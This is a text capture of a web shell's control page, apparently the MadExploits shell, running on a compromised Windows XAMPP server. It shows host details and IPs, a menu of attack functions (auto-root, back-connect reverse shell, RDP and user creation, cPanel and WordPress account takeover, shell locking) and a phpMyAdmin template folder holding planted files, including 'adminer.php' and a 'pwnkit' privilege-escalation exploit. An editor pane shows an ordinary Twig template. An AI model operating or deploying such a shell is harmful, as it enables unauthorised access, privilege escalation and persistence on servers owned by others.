Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.9
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
templates /
table /
[ HOME SHELL ]
Name
Size
Permission
Action
browse_foreigners
[ DIR ]
drwxrwxrwx
chart
[ DIR ]
drwxrwxrwx
delete
[ DIR ]
drwxrwxrwx
export
[ DIR ]
drwxrwxrwx
find_replace
[ DIR ]
drwxrwxrwx
gis_visualization
[ DIR ]
drwxrwxrwx
import
[ DIR ]
drwxrwxrwx
insert
[ DIR ]
drwxrwxrwx
maintenance
[ DIR ]
drwxrwxrwx
operations
[ DIR ]
drwxrwxrwx
partition
[ DIR ]
drwxrwxrwx
privileges
[ DIR ]
drwxrwxrwx
relation
[ DIR ]
drwxrwxrwx
search
[ DIR ]
drwxrwxrwx
structure
[ DIR ]
drwxrwxrwx
tracking
[ DIR ]
drwxrwxrwx
zoom_search
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
index_form.twig
10.26
KB
-rw-rw-rw-
index_rename_form.twig
1.01
KB
-rw-rw-rw-
page_with_secondary_tabs.twig
986
B
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
start_and_number_of_rows_field...
946
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : start_and_number_of_rows_fieldset.twig
<fieldset class="row g-3 align-items-center my-3"> <div class="col-auto"> <label class="col-form-label" for="startRowInput">{% trans 'Start row:' %}</label> </div> <div class="col-auto"> <input class="form-control" id="startRowInput" type="number" name="pos" min="0" value="{{ pos }}"{% if unlim_num_rows > 0 %} max="{{ unlim_num_rows - 1 }}"{% endif %} required> </div> <div class="col-auto"> <label class="col-form-label" for="maxRowsInput">{% trans 'Number of rows:' %}</label> </div> <div class="col-auto"> <input class="form-control" id="maxRowsInput" type="number" name="session_max_rows" min="1" value="{{ rows }}" required> </div> <div class="col-auto"> <input class="btn btn-primary" type="submit" name="submit" value="{% trans 'Go' %}"> </div> <input type="hidden" name="sql_query" value="{{ sql_query }}"> <input type="hidden" name="unlim_num_rows" value="{{ unlim_num_rows }}"> </fieldset>
Close